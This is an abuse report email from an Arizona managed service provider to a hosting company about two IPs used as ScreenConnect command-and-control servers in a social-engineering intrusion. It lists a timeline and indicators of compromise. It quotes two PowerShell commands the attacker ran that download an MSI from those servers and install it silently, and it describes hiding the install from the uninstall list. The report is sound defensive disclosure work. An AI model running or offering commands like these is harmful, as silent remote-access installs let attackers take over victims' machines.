Subject: Abuse Report - Unauthorized Remote Access C2 Servers on 80.76.49.18 and 45.88.91.99 To: abuses@virtuo.host CC: noc@virtuo.host Dear Virtuo Abuse Department, We are reporting two IP addresses on your network that are being used as command-and-control servers for unauthorized remote access attacks against our client's infrastructure. ## Offending IPs - **80.76.49.18** (port 8041) - **45.88.91.99** (port 8041) Both IPs are on AS399486 (12651980 CANADA INC. / Virtuo). ## Nature of Abuse These servers are hosting self-hosted ConnectWise ScreenConnect (remote access) instances on port 8040/8041, used to maintain persistent unauthorized access to victim machines. This is not a legitimate use of remote support software -- the clients are deployed silently via PowerShell commands executed during an active social engineering attack, then hidden from the Windows uninstall list using third-party tools. ## Evidence ### Attack Timeline (March 27, 2026 - UTC-7) 1. At approximately 08:28, an attacker using the alias "Angel Raya" connected to the victim machine via a ScreenConnect cloud relay (instance-wlb9ga-relay.screenconnect.com). 2. At 08:29, the following commands were executed in a PowerShell session on the victim machine to download and silently install ScreenConnect clients from your infrastructure: ``` powershell -Command "Invoke-WebRequest -Uri 'http://80.76.49.18:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait" powershell -Command "Invoke-WebRequest -Uri 'http://45.88.91.99:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait" ``` 3. The attacker then downloaded a tool from sordum.org ("Hide From Uninstall List") to conceal the rogue ScreenConnect installations from Windows Add/Remove Programs. 4. At 11:55, a session identified as "Administrator" connected back through the 80.76.49.18 C2 server, confirming the backdoor was actively used for return access. ### ScreenConnect Service Details **Client connecting to 80.76.49.18:** - Service Name: ScreenConnect Client (0dfe1abae029411c) - Session GUID: eec1c861-ec30-4c7a-a8e7-cc8a1dbd5a56 - Relay: 80.76.49.18:8041 - Version: 25.2.4.9229 **Client connecting to 45.88.91.99:** - Service Name: ScreenConnect Client (a897d9a21259d116) - Session GUID: 406bd356-cde4-4738-a22f-f776c8097686 - Relay: 45.88.91.99:8041 - Version: 25.2.4.9229 ### Additional Context - The ScreenConnect MSI packages have file timestamps from April 8, 2025, indicating this infrastructure has been used for attacks for approximately one year. - The victim's Microsoft 365 account was also subject to brute-force login attempts from IPs in Germany (45.86.202.x), Luxembourg, and Turkey during the same period, with a successful unauthorized sign-in from Istanbul, Turkey (91.93.232.236) on the same day. ## Requested Action We request that you: 1. Immediately suspend the servers at 80.76.49.18 and 45.88.91.99 2. Preserve all logs related to these IPs for law enforcement 3. Provide any subscriber/billing information to law enforcement upon request This incident is being reported to the FBI Internet Crime Complaint Center (IC3) and ConnectWise. ## Reporting Organization Arizona Computer Guru, LLC Managed Service Provider Phone: 520-304-8300 Email: support@azcomputerguru.com Thank you for your prompt attention to this matter.